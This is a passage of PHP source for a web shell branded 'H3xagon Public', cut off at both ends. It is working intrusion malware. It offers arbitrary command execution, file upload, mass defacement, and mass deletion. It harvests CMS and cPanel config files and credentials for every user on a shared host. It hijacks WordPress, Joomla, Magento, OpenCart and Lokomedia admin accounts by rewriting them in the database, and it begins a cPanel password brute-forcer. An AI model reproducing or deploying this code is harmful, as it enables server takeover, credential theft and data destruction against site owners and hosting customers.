	$dir = $_GET['dir'];
	chdir($dir);
} else {
	$dir = getcwd();
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$dir = str_replace("\","/",$dir);
$scdir = explode("/", $dir);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
if(!function_exists('posix_getegid')) {
	$user = @get_current_user();
	$uid = @getmyuid();
	$gid = @getmygid();
	$group = "?";
} else {
	$uid = @posix_getpwuid(posix_geteuid());
	$gid = @posix_getgrgid(posix_getegid());
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}
echo "<span>H3xagon Public</span>";
echo "System: <font color=lime>".$kernel."</font><br>";
echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {	
	echo "<a href='?dir=";
	for($i = 0; $i <= $c_dir; $i++) {
		echo $scdir[$i];
		if($i != $c_dir) {
		echo "/";
		}
	}
	echo "'>$cdir</a>/";
}
echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
echo "<hr>";
echo "<center>";
echo "<ul>";
echo "<li><a href='?'><button class='btn btn-default btn-success'>Home</button></a></li>";
echo "<li><a href='?dir=$dir&do=about'><button class='btn btn-default btn-success'>About</button></a></li>";
echo "<li><a href='?dir=$dir&do=upload'><button class='btn btn-default btn-success'>Upload</button></a></li>";
echo "<li><a href='?dir=$dir&do=cmd'><button class='btn btn-default btn-success'>Command</button></a></li>";
echo "<li><a href='?dir=$dir&do=viewdomains'><button class='btn btn-default btn-success'>View Domains</button></a></li>";
echo "<li><a href='?dir=$dir&do=reverseip'><button class='btn btn-default btn-success'>Reverse IP</button></a></li>";
echo "<li><a href='?dir=$dir&do=whmcsdecod'><button class='btn btn-default btn-success'>WHMCS Decoder</button></a></li>";
echo "<li><a href='?dir=$dir&do=indexing'><button class='btn btn-default btn-success'>Auto Ngindex</button></a></li>";
echo "<li><a href='?dir=$dir&do=mass_deface'><button class='btn btn-default btn-success'>Mass Deface</button></a></li>";
echo "<li><a href='?dir=$dir&do=mass_delete'><button class='btn btn-default btn-success'>Mass Delete</button></a></li>";
echo "<li><a href='?dir=$dir&do=config'><button class='btn btn-default btn-success'>Config</button></a></li>";
echo "<li><a href='?dir=$dir&do=symconfig'><button class='btn btn-default btn-success'>Sym Conf</button></a></li>";
echo "<li><a href='?dir=$dir&do=symlink'><button class='btn btn-default btn-success'>Symlink</button></a></li>";
echo "<li><a href='?dir=$dir&do=symlink2'><button class='btn btn-default btn-success'>Symlink V.2</button></a></li>";
echo "<li><a href='?dir=$dir&do=vhost'><button class='btn btn-default btn-success'>BypassSym VHost</button></a></li>";
echo "<li><a href='?dir=$dir&do=passwbypass'><button class='btn btn-default btn-success'>Bypass etc/passwd</button></a></li>";
echo "<li><a href='?dir=$dir&do=jumping'><button class='btn btn-default btn-success'>Jumping</button></a></li>";
echo "<li><a href='?dir=$dir&do=cpanel'><button class='btn btn-default btn-success'>CPanel Crack</button></a></li>";
echo "<li><a href='?dir=$dir&do=smtp'><button class='btn btn-default btn-success'>SMTP Grabber</button></a></li>";
echo "<li><a href='?dir=$dir&do=zoneh'><button class='btn btn-default btn-success'>Zone-H</button></a></li>";
echo "<li><a href='?dir=$dir&do=defacerid'><button class='btn btn-default btn-success'>Defacer-ID</button></a></li>";
echo "<li><a href='?dir=$dir&do=cgi'><button class='btn btn-default btn-success'>CGI Telnet</button></a></li>";
echo "<li><a href='?dir=$dir&do=network'><button class='btn btn-default btn-success'>Network</button></a></li>";
echo "<li><a href='?dir=$dir&do=adminer'><button class='btn btn-default btn-success'>Adminer</button></a></li><br>";
echo "<li><a href='?dir=$dir&do=fake_root'><button class='btn btn-default btn-success'>Fake Root</button></a></li>";
echo "<li><a href='?dir=$dir&do=auto_edit_user'><button class='btn btn-default btn-success'>Auto Edit User</button></a></li>";
echo "<li><a href='?dir=$dir&do=auto_wp'><button class='btn btn-default btn-success'>Auto Edit Title WordPress</button></a></li>";
echo "<li><a href='?dir=$dir&do=auto_dwp'><button class='btn btn-default btn-success'>WordPress Auto Deface</button></a></li>";
echo "<li><a href='?dir=$dir&do=auto_dwp2'><button class='btn btn-default btn-success'>WordPress Auto Deface V.2</button></a></li>";
echo "<li><a href='?dir=$dir&do=cpftp_auto'><button class='btn btn-default btn-success'>CPanel/FTP Auto Deface</button></a></li>";
echo "<li><a href='?dir=$dir&do=krdp_shell'><button class='btn btn-default btn-success'>K-RDP Shell</button></a></li>";
echo "<li><a href='?logout=true'><button class='btn btn-default btn-danger'>Logout</button></a></li>";
echo "</ul>";
echo "</center>";
echo "<hr>";
if($_GET['logout'] == true) {
	unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
	echo "<script>window.location='?';</script>";
} elseif($_GET['do'] == 'upload') {
	echo "<center>";
	if($_POST['upload']) {
		if($_POST['tipe_upload'] == 'biasa') {
			if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
				$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
			} else {
				$act = "<font color=red>failed to upload file</font>";
			}
		} else {
			$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
			$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
			if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
				if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
					$act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
				} else {
					$act = "<font color=red>failed to upload file</font>";
				}
			} else {
				$act = "<font color=red>failed to upload file</font>";
			}
		}
	}
	echo "Upload File:
	<form method='post' enctype='multipart/form-data'>
	<input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ] 
	<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
	<input type='file' name='ix_file'>
	<input type='submit' value='upload' name='upload'>
	</form>";
	echo $act;
	echo "</center>";
} elseif ($_GET['do'] == 'about') {
	echo "<center>I am H3xagon from Cyber Merah Putih</center><br /><center>Don't Maling ya KK</center>";
} elseif($_GET['do'] == 'cmd') {
	echo "<form method='post'>
	<font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
	<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
	</form>";
	if($_POST['do_cmd']) {
		echo "<pre>".exe($_POST['cmd'])."</pre>";
	}
} elseif ($_GET['do'] == 'viewdomains') {
                                                        echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";
                                                        $d0mains = @file("/etc/named.conf");
                                                        if (!$d0mains) {
                                                            die("<center>Error : can't read [ /etc/named.conf ]</center>");
                                                        }
                                                        echo '<table id="output"><tr><td>Domains</td><td>Users</td></tr>';
                                                        foreach ($d0mains as $d0main) {
                                                            if (eregi("zone", $d0main)) {
                                                                preg_match_all('#zone "(.*)"#', $d0main, $domains);
                                                                flush();
                                                                if (strlen(trim($domains[1][0])) > 2) {
                                                                    $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
                                                                    echo "<tr><td><a href=http://www." . $domains[1][0] . "/>" . $domains[1][0] . "</a></td><td>" . $user['name'] . "</td></tr>";
                                                                    flush();
                                                                }
                                                            }
                                                        }
                                                        echo '</div></center>';
} elseif($_GET['do'] == 'mass_deface') {
	function sabun_massal($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $lokasi<br>";
							file_put_contents($lokasi, $isi_script);
							$idx = sabun_massal($dirc,$namafile,$isi_script);
						}
					}
				}
			}
		}
	}
	function sabun_biasa($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
							file_put_contents($lokasi, $isi_script);
						}
					}
				}
			}
		}
	}
	if($_POST['start']) {
		if($_POST['tipe_sabun'] == 'mahal') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		} elseif($_POST['tipe_sabun'] == 'murah') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		}
	} else {
	echo "<center>";
	echo "<form method='post'>
	<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
	<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
	<font style='text-decoration: underline;'>Folder:</font><br>
	<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Filename:</font><br>
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Index File:</font><br>
	<textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
	<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
	</form></center>";
	}
} elseif($_GET['do'] == 'mass_delete') {
	function hapus_massal($dir,$namafile) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					if(file_exists("$dir/$namafile")) {
						unlink("$dir/$namafile");
					}
				} elseif($dirb === '..') {
					if(file_exists("".dirname($dir)."/$namafile")) {
						unlink("".dirname($dir)."/$namafile");
					}
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							if(file_exists($lokasi)) {
								echo "[<font color=lime>DELETED</font>] $lokasi<br>";
								unlink($lokasi);
								$idx = hapus_massal($dirc,$namafile);
							}
						}
					}
				}
			}
		}
	}
	if($_POST['start']) {
		echo "<div style='margin: 5px auto; padding: 5px'>";
		hapus_massal($_POST['d_dir'], $_POST['d_file']);
		echo "</div>";
	} else {
	echo "<center>";
	echo "<form method='post'>
	<font style='text-decoration: underline;'>Folder:</font><br>
	<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Filename:</font><br>
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
	<input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
	</form></center>";
	}
} elseif($_GET['do'] == 'config') {
	$etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
	$idx = mkdir("h3xagon_kill", 0777);
	$isi_htc = "Options all
Require None
Satisfy Any";
	$htc = fopen("h3xagon_kill/.htaccess","w");
	fwrite($htc, $isi_htc);
	while($passwd = fgets($etc)) {
		if($passwd == "" || !$etc) {
			echo "<font color=red>Can't read /etc/passwd</font>";
		} else {
			preg_match_all('/(.*?):x:/', $passwd, $user_config);
			foreach($user_config[1] as $user_idx) {
				$user_config_dir = "/home/$user_idx/public_html/";
				if(is_readable($user_config_dir)) {
					$grab_config = array(
						"/home/$user_idx/.my.cnf" => "cpanel",
						"/home/$user_idx/.accesshash" => "WHM-accesshash",
						"/home/$user_idx/public_html/po-content/config.php" => "Popoji",
						"/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
						"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
						"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
						"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
						"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
						"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
						"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
						"/home/$user_idx/public_html/forum/config.php" => "phpBB",
						"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
						"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
						"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
						"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
						"/home/$user_idx/public_html/configuration.php" => "Joomla",
						"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
						"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
						"/home/$user_idx/public_html/wp-config.php" => "WordPress",
						"/home/$user_idx/public_html/admin/config.php" => "OpenCart",
						"/home/$user_idx/public_html/slconfig.php" => "Sitelok",
						"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
					foreach($grab_config as $config => $nama_config) {
						$ambil_config = file_get_contents($config);
						if($ambil_config == '') {
						} else {
							$file_config = fopen("h3xagon_kill/$user_idx-$nama_config.txt","w");
							fputs($file_config,$ambil_config);
						}
					}
				}		
			}
		}	
	}
	echo "<center><a href='?dir=$dir/h3xagon_kill'><font color=lime>Selesai</font></a></center>";
} elseif($_GET['do'] == 'jumping') {
	$i = 0;
	echo "<div class='margin: 5px auto;'>";
	if(preg_match("/hsphere/", $dir)) {
		$urls = explode("
", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
							if(is_writable($url_user)) {
								$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
							}
							echo $jrw."<br>";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
			$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
			while($getss = fgets($fp)) {
				echo $getss;
			}
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} elseif(preg_match("/vhosts/", $dir)) {
		$urls = explode("
", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
						if(is_writable($web_vh)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
						}
						echo $jrw."<br>";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
				  bing("ip:$ip");
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} else {
		echo "<pre>";
		$etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_idx_jump) {
										echo " => ( <u>$dj</u> )<br>";
										break;
									}
								}
							}
						} else {
							echo "<br>";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
	}
	echo "</div>";
} elseif($_GET['do'] == 'auto_edit_user') {
	if($_POST['hajar']) {
		if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
			echo "username atau password harus lebih dari 6 karakter";
		} else {
			$user_baru = $_POST['user_baru'];
			$pass_baru = md5($_POST['pass_baru']);
			$conf = $_POST['config_dir'];
			$scan_conf = scandir($conf);
			foreach($scan_conf as $file_conf) {
				if(!is_file("$conf/$file_conf")) continue;
				$config = file_get_contents("$conf/$file_conf");
				if(preg_match("/JConfig|joomla/",$config)) {
					$dbhost = ambilkata($config,"host = '","'");
					$dbuser = ambilkata($config,"user = '","'");
					$dbpass = ambilkata($config,"password = '","'");
					$dbname = ambilkata($config,"db = '","'");
					$dbprefix = ambilkata($config,"dbprefix = '","'");
					$prefix = $dbprefix."users";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
					$result = mysql_fetch_array($q);
					$id = $result['id'];
					$site = ambilkata($config,"sitename = '","'");
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Joomla<br>";
					if($site == '') {
						echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
					} else {
						echo "Sitename => $site<br>";
					}
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/WordPress/",$config)) {
					$dbhost = ambilkata($config,"DB_HOST', '","'");
					$dbuser = ambilkata($config,"DB_USER', '","'");
					$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
					$dbname = ambilkata($config,"DB_NAME', '","'");
					$dbprefix = ambilkata($config,"table_prefix  = '","'");
					$prefix = $dbprefix."users";
					$option = $dbprefix."options";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
					$result = mysql_fetch_array($q);
					$id = $result[ID];
					$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
					$result2 = mysql_fetch_array($q2);
					$target = $result2[option_value];
					if($target == '') {
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
					} else {
						$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
					}
					$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Wordpress<br>";
					echo $url_target;
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/Magento|Mage_Core/",$config)) {
					$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
					$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
					$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
					$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
					$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
					$prefix = $dbprefix."admin_user";
					$option = $dbprefix."core_config_data";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
					$result = mysql_fetch_array($q);
					$id = $result[user_id];
					$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
					$result2 = mysql_fetch_array($q2);
					$target = $result2[value];
					if($target == '') {
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
					} else {
						$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
					}
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Magento<br>";
					echo $url_target;
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
					$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
					$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
					$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
					$dbname = ambilkata($config,"'DB_DATABASE', '","'");
					$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
					$prefix = $dbprefix."user";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
					$result = mysql_fetch_array($q);
					$id = $result[user_id];
					$target = ambilkata($config,"HTTP_SERVER', '","'");
					if($target == '') {
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
					} else {
						$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
					}
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => OpenCart<br>";
					echo $url_target;
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
					$dbhost = ambilkata($config,'server = "','"');
					$dbuser = ambilkata($config,'username = "','"');
					$dbpass = ambilkata($config,'password = "','"');
					$dbname = ambilkata($config,'database = "','"');
					$prefix = "users";
					$option = "identitas";
					$conn = mysql_connect($dbhost,$dbuser,$dbpass);
					$db = mysql_select_db($dbname);
					$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
					$result = mysql_fetch_array($q);
					$target = $result[alamat_website];
					if($target == '') {
						$target2 = $result[url];
						$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
						if($target2 == '') {
							$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
						} else {
							$cek_login3 = file_get_contents("$target2/adminweb/");
							$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
							if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
								$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
							} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
								$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
							} else {
								$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
							}
						}
					} else {
						$cek_login = file_get_contents("$target/adminweb/");
						$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
						if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
							$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
						} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
							$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
						} else {
							$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
						}
					}
					$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
					echo "Config => ".$file_conf."<br>";
					echo "CMS => Lokomedia<br>";
					if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
						echo $url_target2;
					} else {
						echo $url_target;
					}
					if(!$update OR !$conn OR !$db) {
						echo "Status => <font color=red>".mysql_error()."</font><br><br>";
					} else {
						echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
					}
					mysql_close($conn);
				}
			}
		}
	} else {
		echo "<center>
		<h1>Auto Edit User Config</h1>
		<form method='post'>
		DIR Config: <br>
		<input type='text' size='50' name='config_dir' value='$dir'><br><br>
		Set User & Pass: <br>
		<input type='text' name='user_baru' value='H3xagon' placeholder='user_baru'><br>
		<input type='text' name='pass_baru' value='dennyseptian123!!' placeholder='pass_baru'><br>
		<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
		</form>
		<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/h3xagon_kill )</span><br>
		";
	}
} elseif($_GET['do'] == 'cpanel') {
	if($_POST['crack']) {
		$usercp = explode("
", $_POST['user_cp']);
		$passcp = explode("
", $_POST['pass_cp']);
		$i = 0;
		foreach($usercp as $ucp) {
			foreach($passcp as $pcp) {
				if(@mysql_connect('localhost', $ucp, $pcp)) {
					if($_SESSION[$ucp] && $_SESSION[$pcp]) {
					} else {
						$_SESSION[$ucp] = "1";
						$_SESSION[$pcp] = "1";
						if($ucp == '' || $pcp == '') {
							
						} else {
							$i++;
							if(function_exists('posix_getpwuid')) {
								$domain_cp = file_get_contents("/etc/named.conf");	
								if($domain_cp == '') {
									$dom =  "<font color=red>gabisa ambil nama domain nya</font>";
								} else {
									preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
									foreach($domains_cp[1] as $dj) {
										$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
										$user_cp_url = $user_cp_url['name'];
										if($user_cp_url == $ucp) {
											$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
											break;
										}
									}
								}
							} else {
								$dom = "<font color=red>function is Disable by system</font>";
							}
							echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
						}
					}
				}
			}
		}
		if($i == 0) {
		} else {
			echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>H3xagon.</font>";
		}
	} else {
		echo "<center>
		<form method='post'>
		USER: <br>
		<textarea style='width: 450px; height: 150px;' name='user_cp'>";
		$_usercp = fopen("/etc/passwd","r");
		while($getu = fgets($_usercp)) {
			if($getu == '' || !$_usercp) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all("/(.*?):x:/", $getu, $u);
				foreach($u[1] as $user_cp) {
						if(is_dir("/home/$user_cp/public_html")) {
							echo "$user_cp
";
					}
				}
			}
		}
		echo "</textarea><br>
		PASS: <br>
		<textarea style='width: 450px; height: 200px;' name='pass_cp'>";
		function cp_pass($dir) {
			$pass = "";
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				if(!is_file("$dir/$dirb")) continue;
				$ambil = file_get_contents("$dir/$dirb");
				if(preg_match("/WordPress/", $ambil)) {
